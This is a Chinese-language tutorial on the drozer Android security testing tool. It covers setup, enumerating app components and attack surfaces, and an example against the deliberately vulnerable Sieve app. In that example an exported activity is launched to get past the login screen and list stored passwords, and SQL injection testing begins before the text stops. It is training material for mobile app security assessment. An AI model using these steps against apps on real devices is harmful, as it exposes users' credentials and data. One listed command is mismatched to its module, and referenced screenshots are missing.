drozer启动：

1)首先在模拟 器或者安卓设备上开启drozer;

2)然后打开adb，转发端口：

adb forward tcp:31415 tcp:31415

3)在电脑上开启drozer：

drozer.bat console connect

drozer具体使用：

1.使用list命令查看模块：

2.使用run 模块 -h  查看该模块参数命令

3.查看安装应用：使用app.package.list模块

run app.package.list

也可以指定应用，查看其包名

run app.package.list -f Sieve

4.查看特定应用详细信息：使用app.package.info模块

run app.package.info -a com.android.wallpapercropper

信息包括：应用程序版本，数据存储路径，程序安装路径，相关权限等

5.识别攻击面（攻击面：安卓的四大组件：activity，broadcast receiver，content provider，service）：使用app.package.attacksurface模块

run app.package.attacksurface com.android.wallpapercropper

6.查看activity组件信息：使用app.activity.info模块

run app.activity.info -a com.android.wallpapercropper

7.查看broadcast组件信息：使用app.broadcast.info模块

run app.broadcast.info -a com.android.providers.telephony

8.查看content provider组件信息：使用app.provider.info模块

run app.broadcast.info -a com.android.providers.telephony

9.查看service组件信息：使用app.service.info模块

run app.service.info -a com.android.providers.telephony

drozer具体使用示例：

安装该应用

使用drozer检查该应用：

查看包名

查看应用详细信息

查看应用攻击面

查看可利用的activity组件信息

如下图可以看到无法进入登录界面，利用上图中的activity组件，导出密码列表，命令如下：

run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

检测sql注入：

检测存在的注入点

测试是否存在注入，如下图，可知存在sql注入

查看表名：